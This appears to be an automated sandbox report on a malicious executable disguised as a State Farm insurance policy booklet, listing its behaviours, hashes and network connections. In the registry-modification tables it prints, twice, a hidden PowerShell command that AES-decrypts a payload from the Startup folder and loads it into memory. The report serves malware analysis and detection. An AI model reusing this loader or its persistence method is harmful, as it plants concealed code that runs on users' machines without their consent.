Analysis Overview
SHA256
02257b487a0c8a927a63e82adef0d9fafef53bac3bafbb98f417a5cbc3a9d6c0
Threat Level: Likely malicious
The file State-Farm-Auto-Insurance-Policy-Booklet.exe.zip was found to be: Likely malicious.
Malicious Activity Summary
Executes dropped EXE
Drops startup file
Checks computer location settings
Enumerates physical storage devices
Modifies registry class
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-06-10 17:30
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-06-10 17:29
Reported
2022-06-10 17:33
Platform
win7-20220414-en
Max time kernel
114s
Max time network
43s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Plevin.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SXuGZcKhlvoTHGcRbriizwmgfiNLw.zZAHomszxsi | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\yvlobsgsdlyfg\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxTWHVHWmNLaGx2b1RIR2NSYnJpaXp3bWdmaU5Mdy56WkFIb21zenhzaQ=='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\"" | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-790309383-526510583-3802439154-1000_CLASSES\.zzahomszxsi\ = "yvlobsgsdlyfg" | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
"C:\Users\Admin\AppData\Local\Temp\Plevin.exe"
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s
Network
Files
memory/2016-54-0x0000000000A80000-0x0000000000D14000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
| Hash | Value |
|---|---|
| MD5 | dbc534854dd385e59a3f1906ddfb9020 |
| SHA1 | 2b3062d82232ce10a8713829199769ff0d12e0fc |
| SHA256 | 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0 |
| SHA512 | 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951 |
memory/1616-55-0x0000000000000000-mapping.dmp
memory/1616-57-0x0000000075191000-0x0000000075193000-memory.dmp
memory/1360-58-0x0000000000000000-mapping.dmp
memory/1360-59-0x000000001B920000-0x000000001BC02000-memory.dmp
memory/1360-60-0x00000000003D0000-0x00000000003EC000-memory.dmp
memory/1360-61-0x0000000000400000-0x0000000000448000-memory.dmp
memory/1360-62-0x00000000001D0000-0x00000000001D8000-memory.dmp
memory/1360-63-0x0000000002120000-0x00000000021C6000-memory.dmp
memory/1360-64-0x00000000009F0000-0x0000000000A24000-memory.dmp
memory/1360-65-0x0000000000A30000-0x0000000000A7A000-memory.dmp
memory/1360-66-0x0000000000530000-0x0000000000546000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-06-10 17:29
Reported
2022-06-10 17:33
Platform
win10v2004-20220414-en
Max time kernel
106s
Max time network
151s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Plevin.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ISVTiCXTiQbcXcwgXUSwts.HIkwAElPUyfMKdNZZlMsAnLapQSLeWV | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open\command\ = "powershell -windowstyle hidden -command \"$AC=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$AC.Key=[Convert]::FromBase64String('SjQDQJXpF0XycaMaRqevDN2rb/N/xhU/qpHAQAoW3lk=');$EB=[Convert]::FromBase64String([IO.File]::ReadAllText([System.Text.Encoding]::Utf8.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcQWRtaW5cQXBwRGF0YVxSb2FtaW5nXE1pY3Jvc29mdFxXaW5kb3dzXFN0YXJ0IE1lbnVcUHJvZ3JhbXNcU3RhcnR1cFxJU1ZUaUNYVGlRYmNYY3dnWFVTd3RzLkhJa3dBRWxQVXlmTUtkTlpabE1zQW5MYXBRU0xlV1Y='))));$AC.IV = $EB[0..15];$Decryptor=$AC.CreateDecryptor();$UB=$Decryptor.TransformFinalBlock($EB, 16, $EB.Length-16);$AC.Dispose();[Reflection.Assembly]::Load($UB);[Q3L_Glan_Vtc1CPJQkQ70yXjuL3TzE3TZiJsfOSs5gAmyjm5oU53X8JV6OwMDTyztRqYI6.sw9snxC2eLnjjajXWtqtVxBDr52u5]::QfDGsg3D06Lqj7gwQVoPIisR72G4p2enJJGE9();\"" | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\.hikwaelpuyfmkdnzzlmsanlapqslewv | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\.hikwaelpuyfmkdnzzlmsanlapqslewv\ = "xjeunwqrnedfhcfuamca" | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2632097139-1792035885-811742494-1000_Classes\xjeunwqrnedfhcfuamca\shell\open\command | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
|---|---|---|---|
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
|---|---|---|---|
| PID 3800 wrote to memory of 4244 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\Plevin.exe |
| PID 3800 wrote to memory of 4244 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\Plevin.exe |
| PID 3800 wrote to memory of 4244 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\Plevin.exe |
| PID 3800 wrote to memory of 544 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe |
| PID 3800 wrote to memory of 544 | N/A | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe | C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe"
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
"C:\Users\Admin\AppData\Local\Temp\Plevin.exe"
C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe
"C:\Users\Admin\AppData\Local\Temp\State-Farm-Auto-Insurance-Policy-Booklet.exe" /s
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 209.197.3.8:80 | | tcp |
| NL | 104.110.191.133:80 | | tcp |
| NL | 104.110.191.133:80 | | tcp |
| US | 52.168.112.66:443 | | tcp |
| US | 8.8.8.8:53 | 14.110.152.52.in-addr.arpa | udp |
| US | 209.197.3.8:80 | | tcp |
| CH | 146.70.71.174:80 | 146.70.71.174 | tcp |
| NL | 2.17.222.14:80 | | tcp |
Files
memory/3800-130-0x000001B4CEDC0000-0x000001B4CF054000-memory.dmp
memory/3800-131-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
memory/3800-132-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
| Hash | Value |
|---|---|
| MD5 | dbc534854dd385e59a3f1906ddfb9020 |
| SHA1 | 2b3062d82232ce10a8713829199769ff0d12e0fc |
| SHA256 | 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0 |
| SHA512 | 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951 |
memory/4244-133-0x0000000000000000-mapping.dmp
memory/544-135-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\State-Farm-Auto-Insurance-Policy-Booklet.exe.log
| Hash | Value |
|---|---|
| MD5 | fff5cbccb6b31b40f834b8f4778a779a |
| SHA1 | 899ed0377e89f1ed434cfeecc5bc0163ebdf0454 |
| SHA256 | b8f7e4ed81764db56b9c09050f68c5a26af78d8a5e2443e75e0e1aa7cd2ccd76 |
| SHA512 | 1a188a14c667bc31d2651b220aa762be9cce4a75713217846fbe472a307c7bbc6e3c27617f75f489902a534d9184648d204d03ee956ac57b11aa90551248b8f9 |
memory/3800-138-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Plevin.exe
| Hash | Value |
|---|---|
| MD5 | dbc534854dd385e59a3f1906ddfb9020 |
| SHA1 | 2b3062d82232ce10a8713829199769ff0d12e0fc |
| SHA256 | 06486febb76aaa7bf469ba1bf46a92c4eafc42a5626646184e8865c862d09dd0 |
| SHA512 | 1506fbc8fca0a3ca06e24fdae2fb9e8cb345fd6197f5cbbaa990490cc20a25b72906ab9668725f29c0bfce6528bd7dca5dc15ca0ac3c0327d1876e58e3d47951 |
memory/544-139-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
memory/544-140-0x00007FFE12440000-0x00007FFE12F01000-memory.dmp
memory/544-141-0x000001B670240000-0x000001B670262000-memory.dmp